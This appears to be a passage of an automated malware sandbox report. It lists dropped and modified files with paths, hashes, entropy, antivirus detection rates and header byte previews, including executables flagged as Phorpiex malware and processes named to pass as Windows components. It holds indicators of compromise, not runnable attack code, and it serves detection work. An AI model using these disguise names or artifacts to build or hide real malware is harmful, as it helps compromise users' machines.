SSDEEP:	98304:ZMknXV8IFUX81qQ6lLYhJ/N0TB4HBDxWcLKamiwPZhsSZLZ1wpxGN:ZBnXV86UiqrlLY/8AW6YZPZf6HGN
MD5:	13B26B2C7048A92D6A843C1302618FAD
SHA1:	89C2DFC01AC12EF2704C7669844EC69F1700C1CA
SHA-256:	1753AD35ECE25AB9A19048C70062E9170F495E313D7355EBBBA59C38F5D90256
SHA-512:	D6AFF89B61C9945002A6798617AD304612460A607EF1CFBDCB32F8932CA648BCEE1D5F2E0321BB4C58C1F4642B1E0ECECC1EB82450FDEC7DFF69B5389F195455
Malicious:	true
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: ReversingLabs, Detection: 76%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..d......f...............&......X................@.............................pY.......Y...`... .............................................. Y.4....PY.......X.X............`Y.0.............................X.(...................."Y.P............................text...P...........................`..`.data.....V.......V.................@....rdata...9....X..:...xX.............@..@.pdata..X.....X.......X.............@..@.xdata........X.......X.............@..@.bss..........Y..........................idata..4.... Y.......X.............@....CRT....`....0Y.......X.............@....tls.........@Y.......X.............@....rsrc........PY.......X.............@....reloc..0....`Y.......X.............@..B........................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\251299760.exe

Download File

Process:	C:\Users\user\sysppvrdnvs.exe
File Type:	data
Category:	dropped
Size (bytes):	110600
Entropy (8bit):	7.998486619051527
Encrypted:	true
SSDEEP:	3072:LFQC4AbS79Bo0bTtS3v4P09loyBE7QXNn8IJrF:LFQC4A+7jfiw8HoyYQXdXF
MD5:	1FCB78FB6CF9720E9D9494C42142D885
SHA1:	FEF9C2E728AB9D56CE9ED28934B3182B6F1D5379
SHA-256:	84652BB8C63CA4FD7EB7A2D6EF44029801F3057AA2961867245A3A765928DD02
SHA-512:	CDF58E463AF1784AEA86995B3E5D6B07701C5C4095E30EC80CC901FFD448C6F4F714C521BF8796FFA8C47538BF8BF5351E157596EFAA7AB88155D63DC33F7DC3
Malicious:	false
Preview:	NGS!.....8y....j...x9"{[&..TL..,..L.nD..70Ln..MP.B..e...'.LpVJ...g...Y....]...h=....Ot(.P:...jjoF.....2y....:.P@.b...6]u...D\..i4<....Q?......._;]..!.A.4.A......1..c.sa^.+dQ!xl.6Q..8w...a7?..].T%:...H.1....$.j.......4f.k!...p.Fz.v..........?l...5...7...(.....=c.s..c.F.{..-.uE.8.D....QF...\|.8.ey.3'.@<Kq.."S.-..?..4.s......S..2..j=.e..Le.....Yh....+...[}AM.,.@...gW\..Z)..ET.../\|."...b.W........Ro.......j.(\|A,....>.?.1;..>......".&.....;u.c.y..[....t..`...w ..#.....c.dyy...s..G.x_C.h...I]..D....ey...:.FQ.Q...C.. .B.Z.n.2...@X.&>UY.g..D...YZ.)F.!..F...F...e....h4VGK.>.V......3#+.$.,.&.S...lk..I.F\..C.k$).J._l\.",.0u!.k..T....}.V...!..Y.....B....{}.....nAL...[.Xo[+.1\...m.,.^.bLMD.j.-g...... <._8d+-D./.k<..'.....dv...-.Q...i.`........N4W(._"..%.....5q..844o4..g..d..x....s...i.fc.....D..^..].....M(...A..[...gB4..m.w..AV....@.g..5.4.].....BLr!n....W.G,6+uY..9U.4..........O..P....&....?.....v.K.i..>X...7Dt...o=.2........f....bi..C.5N.>.7lf.......^..@F.O

C:\Users\user\AppData\Local\Temp\281653412.exe

Download File

Process:	C:\Windows\sysppvrdnvs.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	15872
Entropy (8bit):	5.151089744220859
Encrypted:	false
SSDEEP:	384:M2moXxWtTFRyGMdMdMdMdMdMdMdMdMP/F2:MJoi6g
MD5:	0C37EE292FEC32DBA0420E6C94224E28
SHA1:	012CBDDDADDAB319A4B3AE2968B42950E929C46B
SHA-256:	981D724FEEBC36777E99513DC061D1F009E589F965C920797285C46D863060D1
SHA-512:	2B60B571C55D0441BA0CFC695F9DB5CD12660EBEC7EFFC7E893C3B7A1C6CB6149DF487C31B8D748697E260CBC4AF29331592B705EA9638F64A711C7A6164628B
Malicious:	true
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: ReversingLabs, Detection: 58%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........0..WQ..WQ..WQ..p...]Q..^)S.TQ..WQ..jQ..^)U.UQ..^)C.BQ..^)D.TQ..^)Q.VQ..RichWQ..........................PE..L......f..................................... ....@..........................p......xn....@..................................&..x....P.......................`..x....................................&..@............ ...............................text...d........................... ..`.rdata....... ......................@..@.data........0......................@....rsrc........P.......6..............@..@.reloc.. ....`.......:..............@..B................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\446629599.exe

Download File

Process:	C:\Windows\sysppvrdnvs.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	modified
Size (bytes):	85504
Entropy (8bit):	6.394560338648692
Encrypted:	false
SSDEEP:	1536:27zFjdFmav82WoPRgMRmtMJXlXXwfAbQaQG9MF7vRjoJrl:yRyO+oPKjoBAIcZF7vqrl
MD5:	06560B5E92D704395BC6DAE58BC7E794
SHA1:	FBD3E4AE28620197D1F02BFC24ADAF4DDACD2372
SHA-256:	9EAAADF3857E4A3E83F4F78D96AB185213B6528C8E470807F9D16035DAADF33D
SHA-512:	B55B49FC1BD526C47D88FCF8A20FCAED900BFB291F2E3E1186EC196A87127ED24DF71385AE04FEDCC802C362C4EBF38EDFC182013FEBF4496DDEB66CE5195EE3
Malicious:	true
Yara Hits:	Rule: JoeSecurity_Phorpiex_4, Description: Yara detected Phorpiex, Source: C:\Users\user\AppData\Local\Temp\446629599.exe, Author: Joe Security
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: ReversingLabs, Detection: 82%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......m.pj)..9)..9)..9 ..9...9Q..8+..9..C9+..9..A9(..9...9+..9..s9-..9)..9...9..e9<..9 ..9-..9 ..95..9 ..9(..9Rich)..9........................PE..L......g.....................p......@y............@..........................p..............................................\|0.......................................................................................................................text............................... ..`.rdata...?.......@..................@..@.data........@.......2..............@...................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\565511239.exe

Download File

Process:	C:\Windows\sysppvrdnvs.exe
File Type:	data
Category:	dropped
Size (bytes):	110600
Entropy (8bit):	7.998486619051527
Encrypted:	true
SSDEEP:	3072:LFQC4AbS79Bo0bTtS3v4P09loyBE7QXNn8IJrF:LFQC4A+7jfiw8HoyYQXdXF
MD5:	1FCB78FB6CF9720E9D9494C42142D885
SHA1:	FEF9C2E728AB9D56CE9ED28934B3182B6F1D5379
SHA-256:	84652BB8C63CA4FD7EB7A2D6EF44029801F3057AA2961867245A3A765928DD02
SHA-512:	CDF58E463AF1784AEA86995B3E5D6B07701C5C4095E30EC80CC901FFD448C6F4F714C521BF8796FFA8C47538BF8BF5351E157596EFAA7AB88155D63DC33F7DC3
Malicious:	false
Preview:	NGS!.....8y....j...x9"{[&..TL..,..L.nD..70Ln..MP.B..e...'.LpVJ...g...Y....]...h=....Ot(.P:...jjoF.....2y....:.P@.b...6]u...D\..i4<....Q?......._;]..!.A.4.A......1..c.sa^.+dQ!xl.6Q..8w...a7?..].T%:...H.1....$.j.......4f.k!...p.Fz.v..........?l...5...7...(.....=c.s..c.F.{..-.uE.8.D....QF...\|.8.ey.3'.@<Kq.."S.-..?..4.s......S..2..j=.e..Le.....Yh....+...[}AM.,.@...gW\..Z)..ET.../\|."...b.W........Ro.......j.(\|A,....>.?.1;..>......".&.....;u.c.y..[....t..`...w ..#.....c.dyy...s..G.x_C.h...I]..D....ey...:.FQ.Q...C.. .B.Z.n.2...@X.&>UY.g..D...YZ.)F.!..F...F...e....h4VGK.>.V......3#+.$.,.&.S...lk..I.F\..C.k$).J._l\.",.0u!.k..T....}.V...!..Y.....B....{}.....nAL...[.Xo[+.1\...m.,.^.bLMD.j.-g...... <._8d+-D./.k<..'.....dv...-.Q...i.`........N4W(._"..%.....5q..844o4..g..d..x....s...i.fc.....D..^..].....M(...A..[...gB4..m.w..AV....@.g..5.4.].....BLr!n....W.G,6+uY..9U.4..........O..P....&....?.....v.K.i..>X...7Dt...o=.2........f....bi..C.5N.>.7lf.......^..@F.O

C:\Users\user\AppData\Local\Temp\65841553.exe

Download File

Process:	C:\Users\user\sysppvrdnvs.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	10240
Entropy (8bit):	5.134070469138298
Encrypted:	false
SSDEEP:	96:vdHiIV5H6c10lqo9ZYAoQdVDCcJ+587tG6AuJxGE9btz2qhRC7tCEOhd1Q:vdHiQ5HV1wr9KA/J+izJxTZtzthyOhd
MD5:	96509AB828867D81C1693B614B22F41D
SHA1:	C5F82005DBDA43CEDD86708CC5FC3635A781A67E
SHA-256:	A9DE2927B0EC45CF900508FEC18531C04EE9FA8A5DFE2FC82C67D9458CF4B744
SHA-512:	FF603117A06DA8FB2386C1D2049A5896774E41F34D05951ECD4E7B5FC9DA51A373E3FCF61AF3577FF78490CF898471CE8E71EAE848A12812FE98CD7E76E1A9CA
Malicious:	true
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: ReversingLabs, Detection: 76%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......k.Y/.../.../...&.`.-...&.f.....&.p.:....k..".../.......&.w.,...&.b.....Rich/...................PE..L...'V.f..................................... ....@..........................`.......e....@.................................<$.......@.......................P......................................x#..@............ ...............................text............................... ..`.rdata..,.... ......................@..@.data........0......................@....rsrc........@....... ..............@..@.reloc.......P.......$..............@..B........................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\70AF.exe

Download File

Process:	C:\Users\user\Desktop\T52Z708x2p.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	9728
Entropy (8bit):	5.254547230411213
Encrypted:	false
SSDEEP:	96:zMn7AN23D0TXraYgnY1dTNDiIp+BYA8vrcVO15uJxGE9YUBz2qh3C7tCEkC:A7ANUYhUYPtp+OFMJxTmUBzthckC
MD5:	8D8E6C7952A9DC7C0C73911C4DBC5518
SHA1:	9098DA03B33B2C822065B49D5220359C275D5E94
SHA-256:	FEB4C3AE4566F0ACBB9E0F55417B61FEFD89DC50A4E684DF780813FB01D61278
SHA-512:	91A573843C28DD32A9F31A60BA977F9A3D4BB19FFD1B7254333E09BCECEF348C1B3220A348EBB2CB08EDB57D56CB7737F026519DA52199C9DC62C10AEA236645
Malicious:	true
Antivirus:	Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: ReversingLabs, Detection: 66%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......gd.##.`p#.`p#.`p}.p!.`p}.p".`p}.p6.`p...p(.`p#.ap..`p}.p .`p*}.p".`pRich#.`p................PE..L.....Df..................................... ....@..........................`......?.....@.................................l$.......@.......................P.......................................#..@............ ...............................text...z........................... ..`.rdata..4.... ......................@..@.data........0......................@....rsrc........@....... ..............@..@.reloc.......P.......$..............@..B........................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_0qtays2e.bdz.ps1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_14skrpgj.cfx.ps1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_4btjyfkd.zju.psm1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_4knadsoy.dxy.ps1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_cpgu24i2.flo.ps1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_e3zl1imx.vwg.ps1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_enuk0itu.als.ps1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_hq3y3e1r.4vl.psm1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_i1utyppo.eom.ps1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_jtbtzrp1.izy.psm1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_lb3cibbb.vie.ps1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_lekqp2gf.iw2.psm1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_lxboixww.31a.psm1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_mbgx5jol.ejt.ps1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_nkfsxg5o.wry.ps1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_nxmr3u4p.l4y.psm1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_rznazit5.3kq.psm1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_su2fkzki.exz.psm1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_t05t35es.gjp.psm1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_z5yemxwm.3ve.psm1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\jacrzswcvuml.tmp

Download File

Process:	C:\Users\user\Microsoft Windows Security\winupsecvmgr.exe
File Type:	PE32+ executable (GUI) x86-64, for MS Windows
Category:	modified
Size (bytes):	5536256
Entropy (8bit):	6.689058470432344
Encrypted:	false
SSDEEP:	98304:VJuCqT8q5Jt3eM2UIDLeIY3I7LMHrPZF6OhgIDxDjP5ysRAwRCVYFufw6:zulp5JtBF6Oh3DxxysRFkRw6
MD5:	8FA2F1BA9B9A7EA2B3C4DD627C627CEC
SHA1:	358E3800286E5D4C5662366AD7311BC5A51BA497
SHA-256:	78A452A6E1A3951DC367F57ACE90711202C824B68835C5DB86814F5B41486947
SHA-512:	74EDD438B806E086A3FACBE8FB98E235068C0D3F8572C6A3A937649CA0E9A6BCB9F0B42E5562E1CBE3576B011AB83730FC622B1496CC448DD3C296284671E775
Malicious:	true
